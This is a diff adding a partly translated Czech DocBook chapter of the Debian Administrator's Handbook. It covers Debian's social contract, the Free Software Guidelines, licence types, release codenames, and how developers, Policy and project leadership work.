+				Debian doesn't own any server in its own name, since it is only a project within the <emphasis>Software in the Public Interest</emphasis> association, and SPI manages the hardware and financial aspects (donations, purchase of hardware, etc.). While initially created specifically for the Debian project, this association now hosts other free software projects, especially the PostgreSQL database, Freedesktop.org (project for standardization of various parts of modern graphical desktop environments, such as GNOME and KDE Plasma), and the Libre Office office suite. <ulink type="block" url="http://www.spi-inc.org/" />
+			</para>
+			 <para>
+				Kromě SPI s Debianem úzce spolupracují různá místní sdružení za účelem vytváření finančních prostředků pro projekt, bez centralizace všeho v USA: v žargonu Debianu jsou označovány za “důvěryhodné organizace”. Toto uspořádání umožňuje vyhnout se neúměrným mezinárodním nákladům za převod a dobře se hodí k decentralizované povaze projektu.
+			</para>
+			 <para>
+				While the list of trusted organizations is rather short, there are many more Debian-related associations whose goal is to promote Debian: <emphasis>Debian France</emphasis>, <emphasis>Debian-ES</emphasis>, <emphasis>debian.ch</emphasis>, and others around the world. Do not hesitate to join your local association and support the project! <ulink type="block" url="https://wiki.debian.org/Teams/Auditor/Organizations" /> <ulink type="block" url="https://france.debian.net/" /> <ulink type="block" url="http://www.debian-es.org/" /> <ulink type="block" url="https://debian.ch/" />
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.foundation-documents">
+		<title>Dokumenty nadace</title>
+		 <indexterm>
+			<primary>Dokumenty nadace</primary>
+		</indexterm>
+		 <para>
+			Několik let po prvotním vydání, Debian formálně stanovil principy, které by měl dodržovat jako svobodný software. Toto úmyslně aktivistické rozhodnutí umožňuje řádný a bezproblémový růst tím, že zajistí, aby se všechny části ubíraly stejným směrem. K tomu, aby se stal vývojářem Debianu, musí každý uchazeč potvrdit a prokázat svou podporu a dodržování zásad stanovených v nadačních dokumentech projektu.
+		</para>
+		 <para>
+			Proces vývoje je neustále projednáván, ale tyto nadační dokumenty jsou obecně a shodně podporovány, a tak zřídka měněny. Stanovy Debianu nabízí také další záruky pro jejich stálost: ke schválení jakékoliv jejich změny je potřeba tří čtvrtin kvalifikované většiny.
+		</para>
+		 <section id="sect.social-contract">
+			<title>Závazek vůči uživatelům</title>
+			 <indexterm>
+				<primary>společenská smlouva</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>smlouva, společenský</primary>
+			</indexterm>
+			 <para>
+				Projekt má také “společenskou smlouvu”. Jaké místo má takovýto text v projektu, který je určen pouze pro vývoj operačního systému? To je docela jednoduché: Debian pracuje pro své uživatele, a tím potažmo i pro společnost. Tato smlouva shrnuje závazky, ke kterým se projekt zavazuje. Dovolte nám je podrobněji popsat:
+			</para>
+			 <orderedlist>
+				<listitem>
+					<para>
+						Debian zůstane ze 100% zdarma.
+					</para>
+					 <para>
+						Toto je pravidlo č. 1. Debian je a zůstane zcela a výhradně složen z volného softwaru. Navíc, veškerý vývoj softwaru sám o sobě v rámci projektu Debian, bude zdarma.
+					</para>
+					 <sidebar> <title><emphasis>POHLED</emphasis>za software</title>
+					 <para>
+						První verze sociální smlouvy Debianu říkala “Debian zůstane 100% svobodný <emphasis>software</emphasis>”. Vyouštění tohoto slova (se schválením verze 1.1 smlouvy v dubnu 2004) naznačuje vůli dosáhnout svobody, a to nejen v softwaru, ale také v dokumentaci a jakémkoliv jiném prvku, který Debian chce poskytovat v rámci svého operačního systému.
+					</para>
+					 <para>
+						Tato změna, která byla zamýšlena pouze jako redakční, měla ve skutečnosti četné následky, zejména v odstranění některé problematické dokumentace. Navíc, problém představuje také stále častější používání firmwaru v ovladačích: mnohé z nich nejsou volné, ale jsou nezbytné pro správné fungování odpovídajícího hardwaru.
+					</para>
+					 </sidebar>
+				</listitem>
+				 <listitem>
+					<para>
+						Vratíme se zpět ke komunitě svobodného softwaru.
+					</para>
+					 <para>
+						Jakékoli zlepšení, kterým projekt Debian přispěl k práci zahrnuté v distribuci, je zasláno zpět autorovi ( tzv. “upstream”). Obecně, Debian bude spolupracovat s komunitou spíše, než pracovat v izolaci.
+					</para>
+					 <sidebar> <title><emphasis>KOMUNITA</emphasis> Upstreamový autor nebo vývojář Debianu?</title>
+					 <indexterm>
+						<primary>upstreamový autor</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>autor, upstream </primary>
+					</indexterm>
+					 <indexterm>
+						<primary>upstream</primary>
+					</indexterm>
+					 <para>
+						Termínem “upstreamový autor” se rozumí autor (autoři) / vývojář (vývojáři) díla, ti, kteří ho píší a vyvíjí. Na druhou stranu, “vývojář Debianu” používá už existující práci a zahrnuje ji do balíku Debianu (termín “správce Debianu” je vhodnější).
+					</para>
+					 <para>
+						V praxi se takové rozlišování často nepovažuje za jednoznačné. Správce Debianu může napsat opravu, která prospívá všem uživatelům díla. Obecně Debian podporuje ty, kteří mají balíček v Debianu na starosti, aby se také zapojili do “upstreamového” vývoje (tak se potom stanou přispěvateli, aniž by byli omezeni na roli pouhých uživatelů programu).
+					</para>
+					 </sidebar>
+				</listitem>
+				 <listitem>
+					<para>
+						Nebudeme skrývat problémy.
+					</para>
+					 <para>
+						Debian není dokonalý a nové problémy, které je třeba opravit budeme nacházet každý den. Celou databázi chybových hlášení budeme mít pro veřejnost kdykoliv otevřenou k nahlédnutí. Hlášení, která lidé zakládají online se okamžitě zviditelní ostatním.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Našimi prioritami jsou naši uživatelé a svobodný software.
+					</para>
+					 <para>
+						Tento závazek je obtížnější definovat. Debian ukládá, tedy pokud je zapotřebí učinit rozhodnutí, zahodit pro vývojáře jednoduché řešení, které bude ohrožovat uživatelskou přívětivost, rozhodout se pro elegantnější řešení, i když je obtížnější ho realizovat. To znamená, že prioritou je zohlednit zájmy uživatelů a volného softwaru.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Práce, které nesplňují naše standardy volného softwaru.
+					</para>
+					 <para>
+						Debian akceptuje a chápe, že uživatelé mohou chtít používat některé programy, co nejsou volné. Proto projekt umožňuje využití částí své infrastruktury k distribuci debianovských balíčků nesvobodného softwaru, které lze bezpečně předistribuovat.
+					</para>
+					 <sidebar> <title><emphasis>KOMUNITA</emphasis> Pro nebo proti nesvobodné sekci?</title>
+					 <indexterm>
+						<primary>nesvobodný</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>sekce</primary>
+						 <secondary>nesvobodná</secondary>
+					</indexterm>
+					 <para>
+						Závazek udržovat strukturu pro přizpůsobení nesvobodného softwaru (tj. “nesvobodná” sekce, viz postranní panel <xref linkend="sidebar.sections" />) je často předmětem debaty v rámci komunity Debianu.
+					</para>
+					 <para>
+						Odpůrci tvrdí, že se to odvrací lidi od volných softwarových ekvivalentů, a je v rozporu se zásadou ve věci poskytování pouze svobodného software. Příznivci nekompromisně konstatují, že většina nesvobodných balíků jsou “téměř zdarma”, a zadržovány jedním nebo dvěma otravnými omezeními (nejběžnější je zákaz komerčního používání softwaru). Distribucí těchto děl v nesvobodné větvi, nepřímo říkáme autorovi, že jeho dílo by bylo lépe známé a hojně používané, pokud by bylo zahrnuto v hlavní sekci. Jsou tak zdvořile vyzváni, aby změnili svou licenci tak, aby vyhovovala tomuto záměru.
+					</para>
+					 <para>
+						Po prvním, bezvýsledném pokusu v roce 2004, je navrácení úplného odstranění nesvobodné sekce na pořad jednání nepravděpodobné, zejména proto, že obsahuje mnoho užitečných dokumentů, které byly přesunuty jednoduše proto, že nesplňovaly nové požadavky pro hlavní část. To platí zejména pro některé soubory dokumentace softwaru vydané projektem GNU (zejména Emacs a Make).
+					</para>
+					 <para>
+						Pokračující existence nesvobodné sekce je zdrojem příležitostných třenic s Nadací svobodného softwaru, a je hlavním důvodem, proč odmítá oficiálně doporučit Debian jako operační systém.
+					</para>
+					 </sidebar>
+				</listitem>
+
+			</orderedlist>
+
+		</section>
+		 <section id="sect.dfsg">
+			<title>Pokyny Debianu pro svobodný software</title>
+			 <indexterm>
+				<primary>zásady volného softwaru</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>DFSG</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Pokyny Debianu pro sovobodný software</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>volný</primary>
+				<secondary>software</secondary>
+			</indexterm>
+			 <para>
+				Tento referenční dokument určuje, který software je “dostatečně volný”, aby byl zahrnut do Debianu. Pokud je licence programu v souladu s těmito zásadami, může být zahrnuta do hlavní části; Naopak, a za předpokladu, že volné šíření je zakázáno, jej lze nalézt v nesvobodné sekci. Nesvobodná sekce není oficiální součástí Debianu; Jedná se o přidanou službu poskytovanou uživatelům.
+			</para>
+			 <para>
+				Více než jen výběrovými kritérii pro Debian, se tento text se stal autoritou na téma svobodného softwaru, a sloužil jako základ pro “definici Open Source”. Historicky je tedy jednou z prvních formálních definic pojmu “svobodný software”.
+			</para>
+			 <para>
+				Všeobecná veřejná licence GNU, BSD licence a Umělecká licence jsou příklady tradičních svobodných licencí, které ctí 9 bodů uvedených v tomto textu. Níže najdete text, který je publikován na webových stránkách Debianu. <ulink type="block" url="http://www.debian.org/social_contract#pokyny" />
+			</para>
+			 <orderedlist>
+				<listitem>
+					<formalpara>
+						<title>Volná redistribuce.</title>
+						 <para>
+							Licence na jakoukoliv součást Debianu nesmí omezovat žádnou stranu v prodeji nebo darování softwaru jako součásti souhrnné distribuce softwaru obsahující programy z několika různých zdrojů. Licence nesmí zahrnovat honorář nebo jiný poplatek za tento prodej.
+						</para>
+
+					</formalpara>
+					 <sidebar> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis>Svobodná licence</title>
+					 <indexterm>
+						<primary>licence</primary>
+						 <secondary>BSD</secondary>
+					</indexterm>
+					 <indexterm>
+						<primary>BSD licence</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>licence</primary>
+						 <secondary>GPL</secondary>
+					</indexterm>
+					 <indexterm>
+						<primary>GPL</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>GNU</primary>
+						 <secondary>Obecné veřejné licence</secondary>
+					</indexterm>
+					 <indexterm>
+						<primary>Obecná veřejná licence</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>licence</primary>
+						 <secondary>umělecké</secondary>
+					</indexterm>
+					 <indexterm>
+						<primary>umělecké licence</primary>
+					</indexterm>
+					 <para>
+						GNU GPL, BSD licence a Umělecká licence jsou v souladu s Pokyny Debianu pro svobodný software, i když jsou velmi odlišné.
+					</para>
+					 <para>
+						GNU GPL, kterou používá a propaguje FSF (Free Software Foundation), je nejběžnější. Její hlavní vlastností je, že se vztahuje i na práci z ní vycházející, která se redistribuje: program zahrnující nebo používající GPL kód může být distribuován pouze v souladu s jeho podmínkami. Zakazuje tedy jakékoli opětovné použití v proprietární aplikaci. To představuje vážné problémy při opětovném použití GPL kódu ve volném softwaru nevyhovujícímu této licenci. Takto je někdy nemožné propojit program zveřejněný pod jinou licencí svobodného softwaru s knihovnou distribuovanou pod GPL. Na druhou stranu, tato licence je velmi pevná v základech v americkém právu: právníci FSF se podíleli na jejím navrhování, takže narušitelé jsou často nuceni dosáhnout přátelské dohody s FSF, aniž by se šlo k soudu. <ulink type="block" url="http://www.gnu.org/copyleft/gpl.html" />
+					</para>
+					 <para>
+						The BSD license is the least restrictive: everything is permitted, including use of modified BSD code in a proprietary application. <ulink type="block" url="http://www.opensource.org/licenses/bsd-license.php" />
+					</para>
+					 <para>
+						Nakonec, Umělecká licence dosahuje kompromisu mezi těmito ostatními dvěma: je povoleno zahrnuzí kódu do proprietární aplikace, ale jakákoliv modifikace musí být zveřejněna. <ulink type="block" url="http://www.opensource.org/licenses/artistic-license-2.0.php" />
+					</para>
+					 <para>
+						Kompletní znění těchto licencí je k dispozici v <filename>/usr/share/Common-licenses/</filename> v libovolném systému Debianu.
+					</para>
+					 </sidebar>
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Zdrojový kód.</title>
+						 <para>
+							Program musí obsahovat zdrojový kód a musí umožňovat distribuci ve zdrojovém kódu, stejně jako v kompilované podobě.
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Odvozená díla.</title>
+						 <para>
+							Licence musí umožňovat úpravy a odvozená díla, a musí umožňovat jejich distribuci za stejných podmínek jako měla licence původního softwaru.
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Integrita zdrojového kódu autora.</title>
+						 <para>
+							Licence může omezit distribuci zdrojového kódu v modifikované podobě <emphasis>pouze</emphasis> pokud licence umožňuje distribuci “patch souborů” se zdrojovým kódem pro účely úpravy programu v okamžiku sestavení. Licence musí výslovně umožňovat distribuci softwaru vytvořeného z modifikovaného zdrojového kódu. Licence může vyžadovat, aby odvozená díla nesla název nebo číslo odlišné od původního softwaru (<emphasis>Toto je kompromis. Skupina Debian nabádá všechny autory, aby nezakazovali úpravy souborů, zdrojových nebo binárních</emphasis>).
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Žádná diskriminace osob nebo skupin.</title>
+						 <para>
+							Licence nesmí diskriminovat žádnou osobu ani skupinu osob.
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Diskriminace proti žádné oblasti lidského úsilí.</title>
+						 <para>
+							Licence nesmí nikomu bránit v užívání programu v konkrétní oblasti lidského úsilí. Například nesmí zakazovat používání programu v podnicích nebo při genetickém výzkumu.
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Přenesení licence.</title>
+						 <para>
+							Práva spojená s programem se musí vztahovat na všechny, komu je program distribuován bez nutnosti provedení dodatečné licence těmito stranami.
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Licence nemůže být pro Debian specifická.</title>
+						 <para>
+							Práva spojená s programem nemůžou záviset na tom, že je program součástí systému Debian. Pokud je program vyjmut z Debianu a používán nebo distribuován bez Debianu, ale jinak v rámci podmínek licence programu, všechny strany, kterým je program distribuován, by měly mít stejná práva jako ta, která jsou udělena ve spojení se systémem Debian.
+						</para>
+
+					</formalpara>
+
+				</listitem>
+				 <listitem>
+					<formalpara>
+						<title>Licence nesmí kontaminovat jiný software.</title>
+						 <para>
+							Licence nesmí omezovat ostatní software, který je distribuován spolu s licencovaným softwarem. Například, licence nesmí trvat na tom, že všechny ostatní programy distribuované na stejném médiu musí být svobodný software.
+						</para>
+
+					</formalpara>
+					 <sidebar> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Copyleft</title>
+					 <indexterm>
+						<primary>copyleft</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>copyrights</primary>
+					</indexterm>
+					 <para>
+						Copyleft je princip, který spočívá v používání autorských práv k zaručení svobody díla a děl z něho odvozených, spíše než k omezení práv na užívání, jako je tomu u proprietárního softwaru. Je to také hra se slovy z pojmu “Copyright”. Richard Stallman přišel na tuto myšlenku, když mu jeho přítel, co má rád slovní hříčky, napsal na jemu adresovanou obálku: “copyleft: všechna práva obrácena”. Copyleft ukládá zachování všech počátečních svobod po distribuci původní nebo modifikované verze díla (obvykle programu). Není tedy možné distribuovat program jako proprietární software, pokud je odvozen z kódu programu, který byl vydán pod copyleftem.
+					</para>
+					 <para>
+						Nejznámější skupinou copyleftových licencí je samozřejmě GNU GPL a její deriváty, GNU LGPL nebo Nižší všeobecná veřejná licence a GNU FDL nebo GNU Svobodná licence pro dokumentaci. Je smutné, že copyleftové licence jsou obyčejně vzájemně neslučitelné. V důsledku toho je nejlepší použít pouze jednu z nich.
+					</para>
+					 </sidebar>
+				</listitem>
+
+			</orderedlist>
+			 <sidebar id="sidebar.bruce-perens"> <title><emphasis>KOMUNITA</emphasis> Bruce Perens, kontroverzní vůdce</title>
+			 <indexterm>
+				<primary>Bruce Perens</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Perens, Bruce</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Open Source</primary>
+			</indexterm>
+			 <para>
+				Bruce Perens byl druhým vedoucím projektu Debian, těsně po Ianu Murdockovi. Byl velmi kontroverzní ve svých dynamických a autoritářských metodách. Přesto zůstává důležitým přispěvatelem Debianu, jemuž je Debian obzvláště zavázán pro sestavení věhlasných “Směrnic Debianu pro svobodný software” (DFSG), původní myšlenky Eana Schuesslera. Následně, Bruce z nich odvodil slavnou “Definici pro Open Source”, kdy z nich odstranil všech odkazy na Debian. <ulink type="block" url="http://www.opensource.org/" />
+			</para>
+			 <para>
+				Jeho odchod z projektu byl dost emotivní, ale Bruce zůstal silně připojený k Debianu, protože stále pokračuje v propagaci této distribuce v politických a ekonomických sférách. Stále se sporadicky objevuje na e-mailových konferencích, aby přispěl svou radou a představil své nejnovější iniciativy ve prospěch Debianu.
+			</para>
+			 <indexterm>
+				<primary>kódové označení</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>označení</primary>
+				<secondary>kódové označení</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Rex</emphasis> </primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Buzz</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Bo</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Hamm</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Slink</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Potato</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Woody</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Sarge</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Etch</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Lenny</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Squeeze</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Wheezy</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Jessie</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Stretch</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Buster</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Bullseye</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="distribution">Sid</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Toy Story</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Pixar</primary>
+			</indexterm>
+			 <para>
+				Last anecdotal point, it was Bruce who was responsible for inspiring the different “codenames” for Debian versions (1.1 — <emphasis role="distribution">Rex</emphasis>, 1.2 — <emphasis role="distribution">Buzz</emphasis>, 1.3 — <emphasis role="distribution">Bo</emphasis>, 2.0 — <emphasis role="distribution">Hamm</emphasis>, 2.1 — <emphasis role="distribution">Slink</emphasis>, 2.2 — <emphasis role="distribution">Potato</emphasis>, 3.0 — <emphasis role="distribution">Woody</emphasis>, 3.1 — <emphasis role="distribution">Sarge</emphasis>, 4.0 — <emphasis role="distribution">Etch</emphasis>, 5.0 — <emphasis role="distribution">Lenny</emphasis>, 6.0 — <emphasis role="distribution">Squeeze</emphasis>, 7 — <emphasis role="distribution">Wheezy</emphasis>, 8 — <emphasis role="distribution">Jessie</emphasis>, 9 — <emphasis role="distribution">Stretch</emphasis>, 10 (not released yet) — <emphasis role="distribution">Buster</emphasis>, 11 (not released yet) — <emphasis role="distribution">Bullseye</emphasis>, <emphasis role="distribution">Unstable</emphasis> — <emphasis role="distribution">Sid</emphasis>). They are taken from the names of characters in the Toy Story movie. This animated film entirely composed of computer graphics was produced by Pixar Studios, with whom Bruce was employed at the time that he led the Debian project. The name “Sid” holds particular status, since it will eternally be associated with the <emphasis role="distribution">Unstable</emphasis> branch. In the film, this character was the neighbor child, who was always breaking toys — so beware of getting too close to <emphasis role="distribution">Unstable</emphasis>. Otherwise, <emphasis role="distribution">Sid</emphasis> is also an acronym for “Still In Development”.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.debian-internals">
+		<title>Vnitřní fungování projektu Debian</title>
+		 <indexterm>
+			<primary>operace, vnitřní</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>organizace, interní</primary>
+		</indexterm>
+		 <para>
+			Bohaté konečné výsledky vyproduktované projektem Debian vycházejí současně z práce na infrastruktuře prováděné zkušenými vývojáři Debianu, z individuálních nebo kolektivních prací vývojářů na debianovských balíčcích a z reakcí uživatelů.
+		</para>
+		 <section>
+			<title>Vývojáři Debianu</title>
+			 <indexterm>
+				<primary>vývojáři</primary>
+				 <secondary>vývojáři Debianu</secondary>
+			</indexterm>
+			 <para>
+				Debian developers have various responsibilities, and as official project members, they have great influence on the direction the project takes. A Debian developer is generally responsible for at least one package, but according to their available time and desire, they are free to become involved in numerous teams, acquiring, thus, more responsibilities within the project. <ulink type="block" url="https://www.debian.org/devel/people" /> <ulink type="block" url="https://www.debian.org/intro/organization" /> <ulink type="block" url="https://wiki.debian.org/Teams" />
+			</para>
+			 <sidebar> <title><emphasis>NÁSTROJ</emphasis>Databáze vývojářů</title>
+			 <indexterm>
+				<primary>vývojáři</primary>
+				 <secondary>databáze vývojářů</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>databáze</primary>
+				 <secondary>databáze vývojářů</secondary>
+			</indexterm>
+			 <para>
+				Debian has a database including all developers registered with the project, and their relevant information (address, telephone, geographical coordinates such as longitude and latitude, etc.). Some of the information (first and last name, country, username within the project, IRC username, GnuPG key, etc.) is public and available on the Web. <ulink type="block" url="https://db.debian.org/" />
+			</para>
+			 <para>
+				Zeměpisné souřadnice umožňují vytvoření mapy s umístěním všech vývojářů po celém světě. Debian je skutečně mezinárodní projekt: jeho vývojáře lze nalézt na všech kontinentech, i když většina je v “západních zemích”.
+			</para>
+			 <figure>
+				<title>Celosvětové rozmístění vývojářů Debianu</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/developers-map.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
+
+				</mediaobject>
+				 <indexterm>
+					<primary>rozmístění po celém světě</primary>
+				</indexterm>
+
+			</figure>
+			 </sidebar> <para>
+				Package maintenance is a relatively regimented activity, very documented or even regulated. It must, in effect, comply with all the standards established by the <emphasis>Debian Policy</emphasis>. Fortunately, there are many tools that facilitate the maintainer's work. The developer can, thus, focus on the specifics of their package and on more complex tasks, such as squashing bugs. <ulink type="block" url="https://www.debian.org/doc/debian-policy/" />
+			</para>
+			 <sidebar> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis>Údržba balíčků, práce vývojáře</title>
+			 <indexterm>
+				<primary>údržba</primary>
+				 <secondary>údržba balíčků</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>balíček</primary>
+				 <secondary>údržba</secondary>
+			</indexterm>
+			 <para>
+				Údržba balíčku znamená nejprve “balení” programu. Konkrétně to znamená definovat prostředky instalace tak, aby po instalaci tento program fungoval a dodržoval pravidla, která projekt Debian pro sebe stanovil. Výsledek této operace je uložen v souboru <filename>.deb</filename>. Účinná instalace programu pak nebude vyžadovat nic víc než extrakci tohoto komprimovaného archivu a spuštění některých předinstalačních nebo poinstalačních zde obsažených skriptů.
+			</para>
+			 <para>
+				Po této počáteční fázi, cyklus údržby opravdu začíná: Příprava aktualizací podle nejnovějších Zásad Debianu, opravy chyb hlášených uživateli a zahrnutí nových “upstreamových” verzí programu, které se přirozeně i nadále současně vyvíjejí. Například v době počátečního balení byl program ve verzi 1.2.3. Po několika měsících vývoje, původní autoři vydávají novou stabilní verzi, očíslovanou 1.4.0. V tuto chvíli by měl správce Debianu balíček aktualizovat, aby uživatelé mohli využívat nejnovější stabilní verzi.
+			</para>
+			 </sidebar> <indexterm>
+				<primary>Zásady Debianu</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Zásady Debianu</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>zásady</primary>
+			</indexterm>
+			 <para>
+				The Policy, an essential element of the Debian Project, establishes the norms ensuring both the quality of the packages and perfect interoperability of the distribution. Thanks to this Policy, Debian remains consistent despite its gigantic size. This Policy is not fixed in stone, but continuously evolves thanks to proposals formulated on the <email>debian-policy@lists.debian.org</email> mailing list. Amendments that are agreed upon by all interested parties are accepted and applied to the text by a small group of maintainers who have no editorial responsibility (they only include the modifications agreed upon by the Debian developers that are members of the above-mentioned list). You can read current amendment proposals on the bug tracking system: <ulink type="block" url="https://bugs.debian.org/debian-policy" />
+			</para>
+			 <sidebar> <title><emphasis>KOMUNITA</emphasis> Proces vydávání Zásad</title>
+			 <para>
+				Kdokoli může navrhnout změnu v Zásadách Debianu pouhým odesláním chybového hlášení s úrovní závažnosti “přání” proti <emphasis role="pkg">debian-policy</emphasis> balíčku. Proces, který se spustí, je dokumentován v <filename>/usr/share/doc/debian-policy/Process.html </filename>: Pokud je uznáno, že zjištěný problém musí být vyřešen vytvořením nového pravidla v Zásadách Debianu, začíná diskuze na seznamu elektronické pošty <email>debian-policy@lists.debian.org</email>, dokud není dosaženo shody a návrh je vydán. Někdo potom návrhne požadovanou změnu a předloží ke schválení (v podobě patche k přezkoumání). Jakmile dva další vývojáři schválí skutečnost, že navrhovaná změna odráží shodu dosaženou v předchozí diskusi (proces “secondování”), návrh může být zařazen do úředního dokumentu jedním ze správců balíčku <emphasis role="pkg">debian-policy</emphasis>. Pokud proces selže v jednom z těchto kroků, správci uzavřou chybu a klasifikují návrh jako zamítnutý.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>ZÁSADY DEBIANU</emphasis> dokumentace</title>
+			 <indexterm>
+				<primary>dokumentace</primary>
+				 <secondary>umístění</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>umístění dokumentu</primary>
+			</indexterm>
+			 <indexterm>
+				<primary> <filename>/usr/share/doc/</filename> </primary>
+			</indexterm>
+			 <indexterm>
+				<primary> <filename>README.Debian</filename> </primary>
+			</indexterm>
+			 <indexterm>
+				<primary> <filename>NEWS.Debian.gz</filename> </primary>
+			</indexterm>
+			 <para>
+				Dokumentace pro každý balíček je uložena v <filename>/usr/share/doc/<replaceable>balíček</replaceable>/</filename>. Tento adresář často obsahuje soubor <filename>README.Debian</filename>, popisující specifické úpravy Debianu, které provádí správce balíčku. Je tedy moudré přečíst si tento soubor před jakýmkoliv nastavováním, a těžit z těchto zkušeností. Nalezneme také soubor <filename>changelog.Debian.gz</filename> popisující změny provedené správcem Debianu při přechodu z jedné verze na následující. To by se nemělo zaměňovat se souborem <filename>changelog.gz</filename> (nebo jeho obdobami), který popisuje změny provedené upstreamovými vývojáři. Soubor <filename>copyright</filename> obsahuje informace o autorech a o licenci vztahující se na software. A na závěr také můžeme najít soubor s názvem <filename>NEWS.Debian.gz</filename>, který vývojářům Debianu umožňuje sdělovat důležité informace týkající se aktualizací; Pokud je nainstalován <emphasis>apt-listchanges</emphasis>, zobrazí se tyto zprávy automaticky. Všechny ostatní soubory jsou specifické pro daný software. Především bychom chtěli poukázat na podadresář <filename>examples</filename>, který často obsahuje příklady konfiguračních souborů.
+			</para>
+			 </sidebar> <para>
+				Zásady do značné míry pokrývají technické aspekty balíčků. Velikost projektu také vyvolává organizační problémy; ty jsou řešeny Stanovami Debianu, které vytváří strukturu a prostředky pro rozhodování. Jinými slovy, formální systém řízení.
+			</para>
+			 <indexterm>
+				<primary>stanovy</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>vedoucí projektu Debian</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>DPL</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>vedoucí</primary>
+				 <secondary>role</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>vedoucí</primary>
+				<secondary>zvolení</secondary>
+			</indexterm>
+			 <para>
+				Stanovy definují určitý počet rolí a postů, plus jejich odpovědnosti a pravomoce. Zejména je třeba poznamenat, že vývojáři Debianu mají vždy konečný rozhodovací pravomoc hlasováním o obecném usnesení, kde je vyžadována kvalifikovaná většina tří čtvrtin (75%) hlasů pro učinění významných změn (např. s dopadem na dokumenty nadace). Nicméně, vývojáři každoročně volí “vedoucího”, aby je zastupoval na schůzkách, a zajistit vnitřní koordinaci mezi různými týmy. Tato volba je vždy obdobím intenzivních diskuzí. Role vedoucího není formálně definována žádným dokumentem: kandidáti na tento post obvykle navrhují vlastní definice pozice. V praxi role vedoucího zahrnuje zastupování vůči sdělovacím prostředkům, koordinaci mezi “interními” týmy a zajišťování celkového vedení projektu, na kterém se vývojáři mohou podílet: záměry DPL jsou implicitně schvalovány většinou členů projektu.
+			</para>
+			 <para>
+				V podstatě má vedoucí opravdové pravomoce; jejich zvolení vzešla z těsných hlasování; mohou učinit jakékoli rozhodnutí, které již není pod pravomocí někoho jiného a mohou delegovat části svých povinností.
+			</para>
+			 <indexterm>
+				<primary>Murdock, Ian</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Perens, Bruce</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Jackson, Ian</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Akkerman, Wichert</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Collins, Ben</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Garbee, Bdale</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Michlmayr, Martin</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Robinson, Branden</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Towns, Anthony</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>McIntyre, Steve</primary>
+			</indexterm>
